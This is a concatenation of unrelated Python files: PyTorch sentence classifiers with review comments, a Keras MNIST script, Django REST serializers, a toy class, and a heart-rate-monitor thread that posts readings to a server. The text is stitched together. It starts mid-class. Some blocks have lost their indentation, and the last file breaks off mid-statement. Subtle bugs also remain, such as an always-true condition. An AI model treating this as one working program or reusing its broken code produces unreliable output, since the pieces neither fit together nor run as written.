            self.embed = nn.Embedding(self.v, self.e)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm)
            if self.bilstm:
                self.u = self.u * 2
            self.attn1 = nn.Linear(self.u, self.r, bias=False)
            self.mlp1 = nn.Linear(self.u, 1)
            self.mlp2 = nn.Linear(self.r, self.c0)
            self.tagger = nn.Linear(self.r, self.c1)
        self.tanh = nn.Tanh()
        self.softmax = nn.Softmax()

    def forward(self, idx, words):
        """words: LongTensor (seq_len, batch) of token ids; idx picks the task."""
        embeds = self.embed(words)
        batch = embeds.size(1)
        slen = embeds.size(0)
        if self.debug:
            print('embeds', embeds.size())
        #embeds = torch.transpose(embeds, 0, 1)
        H, self.hidden = self.lstm(embeds)
        if self.debug:
            print('H', H.size())
            print('u', self.u)
            print('batch', self.batch)
            print('slen', slen)
        H = H.view(batch * slen, self.u)
        if self.debug:
            print('H', H.size())
        A = self.attn1(H)  # shared projection for both tasks
        if self.debug:
            print('A', A.size())
        if idx == 0:
            A = A.view(slen, batch, self.r)
            H = H.view(slen, batch, self.u)
            H = torch.transpose(H, 0, 1)
            A = torch.transpose(A, 0, 1)
            A = torch.transpose(A, 1, 2)  # (batch, r, slen)
            if self.debug:
                print('A', A.size())
                print('H', H.size())
            M = torch.bmm(A, H)  # attention-pooled states, (batch, r, u)
            if self.debug:
                print('M', M.size())
            M = M.view(batch * self.r, -1)
            mlp1 = F.relu(self.mlp1(M))
            mlp1 = mlp1.view(batch, -1)
            if self.debug:
                print('mlp1', mlp1.size())
            mlp2 = F.relu(self.mlp2(mlp1))
            if self.debug:
                print('mlp2', mlp2.size())
            out = F.softmax(mlp2)
        else:
            out = self.tagger(A)
        self.debug = False  # only trace sizes on the first call
        return out
class LSTMTagger(Base):
    """Plain sequence tagger: embed -> LSTM -> linear projection -> tag scores."""

    def __init__(self, param):
        super(LSTMTagger, self).__init__(param)
        self.use_cuda = param['use_cuda']
        self.v = param['vocab_size']    # vocabulary size
        self.e = param['embed_dim']     # embedding dimension
        self.u = param['lstm_dim']      # LSTM hidden size
        self.da = param['da']
        self.r = param['r']             # projection width before tagger
        self.bilstm = param['bilstm']
        self.c = param['tagset_size']
        self.batch = param['batch_size']
        self.debug = True               # prints tensor sizes on first forward only
        self.device = param['device']
        if self.use_cuda:
            self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
            # TODO: using batch_first here caused a large performance hit — why?
            self.lstm = nn.LSTM(self.e, self.u, bias=False).cuda(self.device)
            self.attn = nn.Linear(self.u, self.r).cuda(self.device)
            self.tagger = nn.Linear(self.r, self.c).cuda(self.device)
        else:
            self.embed = nn.Embedding(self.v, self.e)
            self.lstm = nn.LSTM(self.e, self.u, bias=False)
            self.attn = nn.Linear(self.u, self.r)
            self.tagger = nn.Linear(self.r, self.c)
        #self.hidden = self.init_hidden()
        #self.loss_function = nn.NLLLoss()

    def init_hidden(self):
        # Zero (h0, c0) for a single-layer, batch-1 LSTM.
        # BUG FIX: referenced the nonexistent self.lstm_dim (the hidden size
        # is self.u) and wrapped *uninitialized* torch.Tensor storage; use
        # zeros for deterministic behavior.
        return (autograd.Variable(torch.zeros(1, 1, self.u)),
                autograd.Variable(torch.zeros(1, 1, self.u)))

    def forward(self, words):
        """words: LongTensor (seq_len, batch); returns (seq_len*batch, c) raw scores."""
        #words.data.t_()
        if self.debug:
            print('words:', words.size())
        embeds = self.embed(words)
        if self.debug:
            print('embeds:', embeds.size())
        H, self.hidden = self.lstm(embeds)
        H = H.contiguous().view(-1, self.u)
        if self.debug:
            print('H:', H.size())
        A = self.attn(H)
        #A = H
        if self.debug:
            print('A:', A.size())
        #A = F.softmax(self.attn(H))  # severely hurts convergence
        tag_space = self.tagger(A)
        #out = F.softmax(tag_space)  # severely hurts convergence
        out = tag_space
        if self.debug:
            print('out:', out.size())
        self.debug = False
        return out

    def get_tags(self, words):
        """Return the argmax tag ids as a flat numpy array."""
        tag_scores = self.forward(words)
        _, tags = torch.max(tag_scores, dim=1)
        # NOTE(review): .data.numpy() requires a CPU tensor — add .cpu()
        # before calling this with use_cuda enabled.
        tags = tags.data.numpy().reshape((-1,))
        return tags

    def get_loss(self, tags, words):
        """Cross-entropy loss of the raw tag scores against gold tags."""
        tag_scores = self.forward(words=words)
        # BUG FIX: self.loss_function was never created (its init line is
        # commented out), so this raised AttributeError. Since forward()
        # returns raw (un-log-softmaxed) scores, cross_entropy is the
        # correct pairing — and matches Base.get_loss.
        loss = F.cross_entropy(tag_scores, tags)
        return loss
class SelfAttnTagger(Base):
    """Self-attention classifier (batch_first LSTM): embed -> biLSTM ->
    two-layer attention (attn1/attn2) -> softmax over attention rows ->
    mlp2 -> class probabilities."""

    def __init__(self, param):
        super(SelfAttnTagger, self).__init__(param)
        self.use_cuda = param['use_cuda']
        self.v = param['vocab_size']    # vocabulary size
        self.e = param['embed_dim']     # embedding dimension
        self.u = param['lstm_dim']      # per-direction LSTM hidden size
        self.da = param['da']           # attention hidden width
        self.r = param['r']             # attention hops
        self.bilstm = param['bilstm']
        self.c = param['tagset_size']
        self.batch = param['batch_size']
        self.device = param['device']
        # BUG FIX: debug was unconditionally forced to True afterwards,
        # making param['debug'] dead; honor the param instead.
        self.debug = param.get('debug', False)
        if self.use_cuda:
            self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, batch_first=True).cuda(self.device)
            if self.bilstm:
                self.u = self.u * 2  # outputs are fwd+bwd concatenated
            self.attn1 = nn.Linear(self.u, self.da, bias=False).cuda(self.device)
            self.attn2 = nn.Linear(self.da, self.r, bias=False).cuda(self.device)
            #self.mlp1 = nn.Linear(self.u, 1).cuda(self.device)
            self.mlp2 = nn.Linear(self.r, self.c).cuda(self.device)
        else:
            self.embed = nn.Embedding(self.v, self.e)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, batch_first=True)
            if self.bilstm:
                self.u = self.u * 2
            self.attn1 = nn.Linear(self.u, self.da)
            self.attn2 = nn.Linear(self.da, self.r)
            #self.mlp1 = nn.Linear(self.u, 1)
            self.mlp2 = nn.Linear(self.r, self.c)
        self.tanh = nn.Tanh()
        self.softmax = nn.Softmax()

    def forward(self, words):
        """words: LongTensor of token ids; transposed in place to batch-first."""
        words = words.squeeze()
        words.data.t_()  # NOTE: mutates the caller's tensor
        embeds = self.embed(words)
        batch = embeds.size(0)
        slen = embeds.size(1)
        if self.debug:
            print('embeds', embeds.size())
        #embeds = torch.transpose(embeds, 0, 1)
        H, self.hidden = self.lstm(embeds)
        if self.debug:
            print('H', H.size())
            print('u', self.u)
            print('batch', self.batch)
            print('slen', slen)
        H = H.contiguous().view(batch * slen, self.u)
        if self.debug:
            print('H', H.size())
        Attn1 = self.tanh(self.attn1(H))
        if self.debug:
            print('Attn1', Attn1.size())
        Attn2 = self.attn2(Attn1)
        if self.debug:
            print('Attn2', Attn2.size())
        A = self.softmax(Attn2)
        A = A.view(batch, slen, self.r)
        if self.debug:
            print('A', A.size())
        A = A.view(batch * slen, self.r)
        mlp2 = self.mlp2(A)
        if self.debug:
            print('mlp2', mlp2.size())
        out = F.softmax(mlp2)
        self.debug = False  # only trace sizes on the first call
        return out

    def get_loss(self, tags, words):
        """Cross-entropy loss (identical to Base.get_loss; kept for clarity)."""
        logit = self.forward(words)
        loss = F.cross_entropy(logit, tags)
        #loss = F.cross_entropy(self, tags)
        return loss
class NewSelfAttn(Base):
    """Self-attention classifier without batch_first: embed -> biLSTM ->
    single-layer attention (attn1) -> bmm pooling -> mlp1/mlp2 ->
    class probabilities."""

    def __init__(self, param):
        super(NewSelfAttn, self).__init__(param)
        self.use_cuda = param['use_cuda']
        self.v = param['vocab_size']    # vocabulary size
        self.e = param['embed_dim']     # embedding dimension
        self.u = param['lstm_dim']      # per-direction LSTM hidden size
        self.r = param['r']             # attention hops
        self.bilstm = param['bilstm']
        self.c = param['tagset_size']
        self.batch = param['batch_size']
        self.device = param['device']
        # BUG FIX: debug was unconditionally forced to True afterwards,
        # making param['debug'] dead; honor the param instead.
        self.debug = param.get('debug', False)
        if self.use_cuda:
            self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm).cuda(self.device)
            if self.bilstm:
                self.u = self.u * 2  # outputs are fwd+bwd concatenated
            self.attn1 = nn.Linear(self.u, self.r, bias=False).cuda(self.device)
            self.mlp1 = nn.Linear(self.u, 1).cuda(self.device)
            self.mlp2 = nn.Linear(self.r, self.c).cuda(self.device)
        else:
            self.embed = nn.Embedding(self.v, self.e)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm)
            # CONSISTENCY FIX: the GPU branch builds attn1 with bias=False;
            # the CPU branch silently kept a bias, so the two paths trained
            # different models. Align them.
            self.attn1 = nn.Linear(self.u, self.r, bias=False)
            self.mlp1 = nn.Linear(self.u, 1)
            self.mlp2 = nn.Linear(self.r, self.c)
        self.tanh = nn.Tanh()
        self.softmax = nn.Softmax()

    def forward(self, words):
        """words: LongTensor (seq_len, batch) of token ids."""
        embeds = self.embed(words)
        batch = embeds.size(1)
        slen = embeds.size(0)
        if self.debug:
            print('embeds', embeds.size())
        #embeds = torch.transpose(embeds, 0, 1)
        H, self.hidden = self.lstm(embeds)
        if self.debug:
            print('H', H.size())
            print('u', self.u)
            print('batch', self.batch)
            print('slen', slen)
        H = H.view(batch * slen, self.u)
        if self.debug:
            print('H', H.size())
        #A = self.tanh(self.attn1(H))
        A = self.attn1(H)
        if self.debug:
            print('A', A.size())
        #A = self.softmax(Attn2)
        A = A.view(slen, batch, self.r)
        H = H.view(slen, batch, self.u)
        H = torch.transpose(H, 0, 1)
        A = torch.transpose(A, 0, 1)
        A = torch.transpose(A, 1, 2)  # (batch, r, slen)
        if self.debug:
            print('A', A.size())
            print('H', H.size())
        M = torch.bmm(A, H)  # attention-pooled states, (batch, r, u)
        if self.debug:
            print('M', M.size())
        M = M.view(batch * self.r, -1)
        mlp1 = F.relu(self.mlp1(M))
        mlp1 = mlp1.view(batch, -1)
        if self.debug:
            print('mlp1', mlp1.size())
        mlp2 = F.relu(self.mlp2(mlp1))
        if self.debug:
            print('mlp2', mlp2.size())
        out = F.softmax(mlp2)
        self.debug = False  # only trace sizes on the first call
        return out
class JKSelfAttn(Base):
    '''Self attention copy of jkchen's tensorflow codes: embed -> biLSTM
    (batch_first, dropout) -> two-layer attention -> bmm pooling ->
    mean over hops -> mlp1 -> raw class scores.'''

    def __init__(self, param):
        super(JKSelfAttn, self).__init__(param)
        self.use_cuda = param['use_cuda']
        self.v = param['vocab_size']    # vocabulary size
        self.e = param['embed_dim']     # embedding dimension
        self.u = param['lstm_dim']      # per-direction LSTM hidden size
        self.da = param['da']           # attention hidden width
        self.r = param['r']             # attention hops
        self.bilstm = param['bilstm']
        self.c = param['tagset_size']
        self.batch = param['batch_size']
        self.device = param['device']
        # BUG FIX: debug was unconditionally forced to True afterwards,
        # making param['debug'] dead; honor the param instead.
        self.debug = param.get('debug', False)
        if self.use_cuda:
            self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, dropout=param['dropout'], batch_first=True).cuda(self.device)
            if self.bilstm:
                self.u = self.u * 2  # outputs are fwd+bwd concatenated
            self.attn1 = nn.Linear(self.u, self.da, bias=False).cuda(self.device)
            self.attn2 = nn.Linear(self.da, self.r, bias=False).cuda(self.device)
            self.mlp1 = nn.Linear(self.u, self.c).cuda(self.device)
            self.mlp2 = nn.Linear(self.r, self.c).cuda(self.device)
        else:
            self.embed = nn.Embedding(self.v, self.e)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, dropout=param['dropout'], batch_first=True)
            if self.bilstm:
                self.u = self.u * 2
            # CONSISTENCY FIX: the GPU branch builds both attention layers
            # with bias=False; the CPU branch silently kept biases, so the
            # two paths trained different models. Align them.
            self.attn1 = nn.Linear(self.u, self.da, bias=False)
            self.attn2 = nn.Linear(self.da, self.r, bias=False)
            self.mlp1 = nn.Linear(self.u, self.c)
            self.mlp2 = nn.Linear(self.r, self.c)
        '''
        self.lstm.apply(self.weight_init)
        self.attn1.apply(self.weight_init)
        self.attn2.apply(self.weight_init)
        self.mlp1.apply(self.weight_init)
        self.mlp2.apply(self.weight_init)
        '''

    def weight_init(self, m):
        """Xavier-uniform init for LSTM weight matrices and Linear weights."""
        if isinstance(m, nn.LSTM):
            for _a in m.all_weights[0]:
                if len(_a.size()) == 1:
                    continue  # skip bias vectors
                nn.init.xavier_uniform(_a)
        if isinstance(m, nn.Linear):
            m.weight.data = nn.init.xavier_uniform(m.weight.data)

    def dist(self, tensor):
        """Std-dev of row distances from the row mean (debug statistic)."""
        b = tensor.cpu().data.numpy()
        mean = b.sum(0) / b.shape[0]
        import numpy as np
        c = np.array([np.linalg.norm(b[i] - mean) for i in range(b.shape[0])])
        return np.std(c)

    def forward(self, words, log=False):
        """words: LongTensor of token ids; transposed in place to batch-first."""
        words = words.squeeze()
        words.data.t_()  # NOTE: mutates the caller's tensor
        embeds = self.embed(words)
        batch = embeds.size(0)
        slen = embeds.size(1)
        if self.debug:
            print('embeds', embeds.size())
        #embeds = torch.transpose(embeds, 0, 1)
        H, self.hidden = self.lstm(embeds)
        if log:
            print('H std:', self.dist(H))
        if self.debug:
            print('H', H.size())
            print('u', self.u)
            print('batch', self.batch)
            print('slen', slen)
        H = H.contiguous().view(batch * slen, self.u)
        if self.debug:
            print('H', H.size())
        # torch.tanh replaces the deprecated F.tanh (identical function)
        Attn1 = torch.tanh(self.attn1(H))
        if self.debug:
            print('Attn1', Attn1.size())
        Attn2 = self.attn2(Attn1)
        if self.debug:
            print('Attn2', Attn2.size())
        A = F.softmax(Attn2)
        A = A.view(batch, slen, self.r)
        H = H.view(batch, slen, self.u)
        A = torch.transpose(A, 1, 2)  # (batch, r, slen)
        if self.debug:
            print('A', A.size())
            print('H', H.size())
        M = torch.bmm(A, H)  # attention-pooled states, (batch, r, u)
        if self.debug:
            print('M', M.size())
        if log:
            print('M std:', self.dist(M))
        #print(M)
        M = torch.mean(M, 1)  # average the r hops
        M = M.squeeze()
        if self.debug:
            print('M', M.size())
        mlp1 = self.mlp1(M)
        if self.debug:
            print('mlp1', mlp1.size())
        #out = F.softmax(mlp1)
        out = mlp1
        self.debug = False  # only trace sizes on the first call
        return out
class SingleSelfAttn(Base):
    """Self-attentive sentence classifier (Lin et al. 2017 style).

    (Bi)LSTM encoder -> structured self-attention with r hops -> a
    per-hop scalar MLP -> final linear layer + softmax over classes.
    Differs from the sibling model above in that mlp1 maps each hop's
    context vector to a scalar instead of averaging the hops.
    """
    def __init__(self, param):
        super(SingleSelfAttn, self).__init__(param)
        self.use_cuda = param['use_cuda']
        self.v = param['vocab_size']    # vocabulary size
        self.e = param['embed_dim']     # embedding dimension
        self.u = param['lstm_dim']      # LSTM hidden size (doubled below if bilstm)
        self.da = param['da']           # attention hidden size
        self.r = param['r']             # number of attention hops
        self.bilstm = param['bilstm']
        self.c = param['tagset_size']   # number of output classes
        self.batch = param['batch_size']
        self.device = param['device']
        if 'debug' in param:
            self.debug = param['debug']
        else:
            self.debug = False
        # NOTE(review): unconditionally overrides the 'debug' param above —
        # debug printing is always on for the first forward pass.
        self.debug = True
        if self.use_cuda:
            self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, dropout=param['dropout'], batch_first=True).cuda(self.device)
            if self.bilstm:
                self.u = self.u * 2
            self.attn1 = nn.Linear(self.u, self.da, bias=False).cuda(self.device)
            self.attn2 = nn.Linear(self.da, self.r, bias=False).cuda(self.device)
            self.mlp1 = nn.Linear(self.u, 1).cuda(self.device)  # hop -> scalar
            self.mlp2 = nn.Linear(self.r, self.c).cuda(self.device)
        else:
            self.embed = nn.Embedding(self.v, self.e)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm, dropout=param['dropout'], batch_first=True)
            if self.bilstm:
                self.u = self.u * 2
            self.attn1 = nn.Linear(self.u, self.da)
            self.attn2 = nn.Linear(self.da, self.r)
            self.mlp1 = nn.Linear(self.u, 1)
            self.mlp2 = nn.Linear(self.r, self.c)
    '''
    self.lstm.apply(self.weight_init)
    self.attn1.apply(self.weight_init)
    self.attn2.apply(self.weight_init)
    self.mlp1.apply(self.weight_init)
    self.mlp2.apply(self.weight_init)
    '''
    def weight_init(self, m):
        """Xavier-init weights of LSTM/Linear modules (biases skipped).

        NOTE(review): uses the deprecated nn.init.xavier_uniform API and
        only touches all_weights[0] of the LSTM; kept byte-identical.
        """
        if isinstance(m, nn.LSTM):
            for _a in m.all_weights[0]:
                if len(_a.size()) == 1:
                    continue
                nn.init.xavier_uniform(_a)
        if isinstance(m, nn.Linear):
            m.weight.data = nn.init.xavier_uniform(m.weight.data)
    def dist(self, tensor):
        """Std-dev of each row's distance to the mean row (spread diagnostic)."""
        b = tensor.cpu().data.numpy()
        mean = b.sum(0) / b.shape[0]
        import numpy as np
        c = np.array([np.linalg.norm(b[i] - mean) for i in range(b.shape[0])])
        return np.std(c)
    def forward(self, words, log=False):
        """Encode token-id sequences and return softmax class probabilities.

        :param words: token-id tensor; transposed in place — assumed to
            arrive as (seq_len, batch).  TODO confirm at caller.
        :param log: if True, print spread diagnostics.
        :return: softmax output of mlp2 (probabilities, not logits).
        """
        words = words.squeeze()
        words.data.t_()
        embeds = self.embed(words)
        batch = embeds.size(0)
        slen = embeds.size(1)
        if self.debug:
            print('embeds', embeds.size())
        #embeds = torch.transpose(embeds, 0, 1)
        H, self.hidden = self.lstm(embeds)
        if log:
            print('H std:', self.dist(H))
        if self.debug:
            print('H', H.size())
            print('u', self.u)
            print('batch', self.batch)
            print('slen', slen)
        # flatten to (batch*slen, u) so the attention linears apply per token
        H = H.contiguous().view(batch * slen, self.u)
        if self.debug:
            print('H', H.size())
        Attn1 = F.tanh(self.attn1(H))
        if self.debug:
            print('Attn1', Attn1.size())
        Attn2 = self.attn2(Attn1)
        if self.debug:
            print('Attn2', Attn2.size())
        A = F.softmax(Attn2)
        A = A.view(batch, slen, self.r)
        H = H.view(batch, slen, self.u)
        # A: (batch, r, slen) — one token distribution per hop
        A = torch.transpose(A, 1, 2)
        if self.debug:
            print('A', A.size())
            print('H', H.size())
        # M: (batch, r, u) — one context vector per hop
        M = torch.bmm(A, H)
        if self.debug:
            print('M', M.size())
        if log:
            print('M std:', self.dist(M))
        #print(M)
        # score each hop with a scalar, then map the r scores to classes
        M = M.view(batch * self.r, -1)
        mlp1 = F.relu(self.mlp1(M))
        #mlp1 = self.mlp1(M)
        mlp1 = mlp1.view(batch, -1)
        if self.debug:
            print('mlp1', mlp1.size())
        #mlp2 = F.relu(self.mlp2(mlp1))
        mlp2 = self.mlp2(mlp1)
        if self.debug:
            print('mlp2', mlp2.size())
        if log:
            print('mlp2 std:', self.dist(mlp2))
            print(mlp2)
        out = F.softmax(mlp2)
        # debug prints only fire on the first forward pass
        self.debug = False
        return out
class SingleLSTM(Base):
    """Single-layer LSTM sentence classifier.

    Embeds a token-id sequence, runs one unidirectional LSTM, and
    classifies from the LAST timestep's log-softmax scores.
    """
    def __init__(self, param):
        super(SingleLSTM, self).__init__(param)
        V = param['vocab_size']
        D = param['embed_dim']
        C = param['tagset_size']
        self.hidden_dim = param['hidden_dim']
        self.embed = nn.Embedding(V, D)
        self.embed_dim = D
        self.use_cuda = param['use_cuda']
        self.device = param['device']
        '''
        if self.lower:
            self.embed_dim += CAP_DIM
        '''
        self.lstm = nn.LSTM(D, param['hidden_dim'])
        self.hidden2tag = nn.Linear(param['hidden_dim'], param['tagset_size'])
        # NOTE(review): self.hidden is initialised but never passed to
        # self.lstm in forward(), so the LSTM starts from zeros each call.
        self.hidden = self.init_hidden()
        self.loss_function = nn.NLLLoss()
    def init_hidden(self):
        # Before we've done anything, we dont have any hidden state.
        # Refer to the Pytorch documentation to see exactly why they have this dimensionality.
        # The axes semantics are (num_layers, minibatch_size, hidden_dim)
        # NOTE(review): torch.Tensor(...) allocates UNINITIALISED memory,
        # not zeros — harmless only because this state is never used.
        return (autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)),
                autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)))
    def forward(self, words):
        """Return (1, C) log-softmax scores taken from the final timestep.

        :param words: 1-D token-id tensor for a single sentence.
        """
        words = words.squeeze()
        #print(type(words))
        #print(len(words))
        embeds = self.embed(words)
        #print(embeds.size())
        #print(embeds.view(len(words), 1, -1).size())
        '''
        if self.lower:
            caps = input['caps']
            input_caps = torch.FloatTensor(len(caps), CAP_DIM)
            input_caps.zero_()
            input_caps.scatter_(1, caps.view(-1,1) ,1)
            input_caps = autograd.Variable(input_caps)
            embeds = torch.cat((embeds, input_caps),1)
        '''
        # sequence as (seq_len, batch=1, embed_dim)
        lstm_out, self.hidden = self.lstm(embeds.view(len(words), 1, -1))
        tag_space = self.hidden2tag(lstm_out.view(len(words), -1))
        #return tag_space[-1].view(1,-1)
        tag_scores = F.log_softmax(tag_space)
        # only the last timestep's scores represent the whole sentence
        return tag_scores[-1].view(1, -1)
        #tag_scores = nn.LogSoftmax(tag_space)
        #return tag_scores[-1]
class SingleCNN(Base):
    """Kim (2014)-style CNN sentence classifier.

    Parallel 2-D convolutions with kernel widths 3/4/5 over the embedded
    sentence, max-over-time pooling, dropout, and one linear layer to
    the tagset logits.
    """
    def __init__(self, param):
        super(SingleCNN, self).__init__(param)
        V = param['vocab_size']
        Ks = [3, 4, 5]           # convolution kernel widths (in tokens)
        D = param['embed_dim']
        Co = 100                 # feature maps per kernel width
        Ci = 1                   # single input channel
        self.use_cuda = param['use_cuda']
        C = param['tagset_size']
        print('V: %d, D: %d, C: %d, Co: %d, Ks, %s'%(V, D, C, Co, Ks))
        self.device = param['device']
        self.debug = True
        # FIX: the conv layers were kept in a plain Python list, which
        # hides them from .parameters()/state_dict()/.cuda() — they were
        # never trained or saved.  nn.ModuleList registers them properly
        # while still iterating exactly like a list.
        if self.use_cuda:
            self.embed = nn.Embedding(V, D).cuda(self.device)
            self.convs1 = nn.ModuleList(
                [nn.Conv2d(Ci, Co, (K, D)).cuda(self.device) for K in Ks])
        else:
            self.embed = nn.Embedding(V, D)
            self.convs1 = nn.ModuleList([nn.Conv2d(Ci, Co, (K, D)) for K in Ks])
        self.dropout = nn.Dropout(0.5)
        self.fc1 = nn.Linear(len(Ks)*Co, C)
        #self.loss_function = nn.NLLLoss()
    def init_hidden(self):
        # NOTE(review): dead copy-paste from the LSTM model — hidden_dim
        # is never set on this class and torch.Tensor(...) is
        # uninitialised memory; left in place since nothing calls it.
        return (autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)),
                autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)))
    def forward(self, words):
        """Return (N, C) logits for a batch of token-id sequences.

        :param words: token-id tensor; transposed in place, assumed to
            arrive as (seq_len, batch) — TODO confirm at caller.
        """
        words.data.t_()
        if type(words) is torch.LongTensor:
            words = Variable(words)
        if self.debug:
            print('words.size: ', words.size())
        x = self.embed(words)
        if self.debug:
            print('embed.size: ', x.size())
        x = x.unsqueeze(1)  # (N,Ci,W,D)
        if self.debug:
            print('embed.size: ', x.size())
        x = [F.relu(conv(x)).squeeze(3) for conv in self.convs1]  # [(N,Co,W), ...]*len(Ks)
        if self.debug:
            for _x in x:
                print('relu.size: ', _x.size())
        # max-over-time pooling collapses the variable-length axis
        x = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x]  # [(N,Co), ...]*len(Ks)
        if self.debug:
            for _x in x:
                print('pool.size: ', _x.size())
        x = torch.cat(x, 1)
        if self.debug:
            print('cat.size: ', x.size())
        x = self.dropout(x)  # (N,len(Ks)*Co)
        if self.debug:
            print('dropout.size: ', x.size())
        logit = self.fc1(x)  # (N,C)
        if self.debug:
            print('fc1.size: ', logit.size())
        # debug prints only fire on the first forward pass
        self.debug = False
        return logit
'''
def predict(self, **input):
#TODO: caps
words = input['words']
output = self.forward(words=words)
_, tag_id = torch.max(output, dim=0)
return tag_id
def get_loss(self, tags, **input):
words = input['words']
logit = self.forward(words=words)
loss = F.cross_entropy(logit, tags)
#loss = F.cross_entropy(self, tags)
return loss
'''
"""
class ShareLSTM(Base):
def __init__(self, param):
super(ShareLSTM, self).__init__(param)
V = param['vocab_size']
D = param['embed_dim']
C = param['tagset_size']
self.hidden_dim = param['hidden_dim']
self.embed = nn.Embedding(V, D)
self.embed_dim = D
'''
if self.lower:
self.embed_dim += CAP_DIM
'''
self.lstm = nn.LSTM(D, param['hidden_dim'])
# The linear layer that maps from hidden state space to tag space
self.w1 = nn.Linear(param['hidden_dim'], C)
self.w2 = nn.Linear(param['hidden_dim'], 2)
self.hidden = self.init_hidden()
self.loss_function = nn.NLLLoss()
def init_hidden(self):
return (autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)),
autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)))
def forward(self, words):
embeds = self.embed(words)
if self.lower:
caps = input['input_caps']
input_caps = torch.FloatTensor(len(caps), CAP_DIM)
input_caps.zero_()
input_caps.scatter_(1, caps.view(-1, 1), 1)
input_caps = autograd.Variable(input_caps)
embeds = torch.cat((embeds, input_caps), 1)
lstm_out, self.hidden = self.lstm(embeds.view(len(words), 1, -1))
if input['data_set'] == 1:
tag_space = self.w1(lstm_out.view(len(words), -1))
else:
tag_space = self.w2(lstm_out.view(len(words), -1))
#tag_space = self.hidden2tag(lstm_out.view(1, -1))
tag_scores = F.log_softmax(tag_space)
#tag_scores = nn.LogSoftmax(tag_space)
return tag_scores[-1]
def get_tags(self, **input):
words = input['words']
if self.lower:
input_caps = input['input_caps']
output = self.forward(words,
input_caps=input_caps,
data_set=input['data_set'])
else:
output = self.forward(words=words)
_, tag_id = torch.max(output, dim=0)
return tag_id
def get_loss(self, tags, **input):
words = input['words']
if self.lower:
input_caps = input['input_caps']
tag_scores = self.forward(words=words, input_caps=input_caps, data_set=input['data_set'])
else:
tag_scores = self.forward(words=words)
loss = self.loss_function(tag_scores, tags)
return loss
def get_loss_2(self, data_set, tags, **input):
words = input['words']
if self.lower:
input_caps = input['input_caps']
tag_scores = self.forward(data_set, words=words, input_caps=input_caps)
else:
tag_scores = self.forward(data_set, words=words)
loss = self.loss_function(tag_scores, tags)
return loss
""" |
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np

# Load MNIST and scale each sample's pixel values.
data = tf.keras.datasets.mnist
(x_train, y_train), (x_test, y_test) = data.load_data()
x_train = tf.keras.utils.normalize(x_train, axis=1)
x_test = tf.keras.utils.normalize(x_test, axis=1)

# Two hidden ReLU layers, softmax output over the 10 digit classes.
model = tf.keras.models.Sequential([
    tf.keras.layers.Flatten(),
    tf.keras.layers.Dense(128, activation=tf.nn.relu),
    tf.keras.layers.Dense(128, activation=tf.nn.relu),
    tf.keras.layers.Dense(10, activation=tf.nn.softmax),
])
model.compile(optimizer="adam",
              loss="sparse_categorical_crossentropy",
              metrics=['accuracy'])
model.fit(x_train, y_train, epochs=3)

# To persist/reload the trained model:
#   model.save('epic.model')
#   new_model = tf.keras.models.load_model('epic.model')

# Evaluate on the held-out set, then show the first five predictions.
val_loss, val_acc = model.evaluate(x_test, y_test)
print(val_loss, val_acc)
prediction = model.predict(x_test)
for i in range(5):
    plt.grid(False)
    plt.imshow(x_test[i], cmap=plt.cm.binary)
    plt.xlabel("actual :" + str(y_test[i]))
    plt.title("predicted : "+str(np.argmax(prediction[i])))
    plt.show()
from blogging.models import Post, Category
from rest_framework import serializers
class PostSerializer(serializers.HyperlinkedModelSerializer):
    """DRF serializer exposing the display fields of a blog Post."""
    class Meta:
        model = Post
        fields = ['title', 'text', 'author', 'created_date', 'modified_date', 'published_date', 'categories']
class CategorySerializer(serializers.HyperlinkedModelSerializer):
    """DRF serializer exposing the name/description of a Category."""
    class Meta:
        model = Category
        fields = ['name', 'description']
'''
Created on 11-Feb-2019
@author: prasannakumar
'''
class work1:
    """Toy demo class; each method just prints a capability message."""
    def cutting(self):
        """Print the tree-cutting capability message."""
        print("the worker can cut the trees")
    def jump(self):
        """Print the jumping capability message."""
        print("the man can jump")
# module-level smoke print, runs on import
print("pk")
import threading
from time import sleep
from HRMListener import *
from usb import USBError
import requests
import config
import json
class HRMThread(threading.Thread):
# #inerval is the period the thread get HR from device
def __init__(self, monitorScreen, statusMessage, interval=10, userID=None):
threading.Thread.__init__(self)
self.listener = HRMListener(netkey=NETKEY, serial=SERIAL)
self.monitorScreen = monitorScreen
self.interval = interval
self.alive = False
self.exception = None
self.statusMessage = statusMessage
self.userID = userID
self.failure_count = 0
def run(self):
try:
self.listener.start()
self.alive = True
self.showMessage("Hardware Connected.")
except USBError as e:
self.showMessage("USBError: " + e.message)
self.alive = False
except exceptions.DriverError as e:
self.showMessage("DriverError: " + e.message)
self.alive = False
while self.alive:
if self.userID is not None and self.listener.getHR() != '0':
self.postHRToServer(self.listener.getHR())
self.updateScreen()
sleep(self.interval)
def postHRToServer(self, heartRate):
try:
destUrl = config.url + '/active_user/' + str(self.userID) + '/heart_rate'
body = {'id': self.userID, 'heart_rate': str(heartRate)}
r = requests.post(url=destUrl, json=body)
msg = json.loads(str(r.text))
print 'HRM Message', msg['message']
if msg['message'] is 'User not activated':
self.showMessage('Not activated, please activate through website.')
self.failure_count += 1
if msg['message'] != 'recorded' or 'User not activated':
print 'post hr: ', heartRate
self.failure_count += 1
elif msg['message'] == 'timeReached':
self.showMessage('Session time Finished.')
else:
self.showMessage(msg['message'])
except (requests.HTTPError, requests.ConnectionError, requests.RequestException) as e:
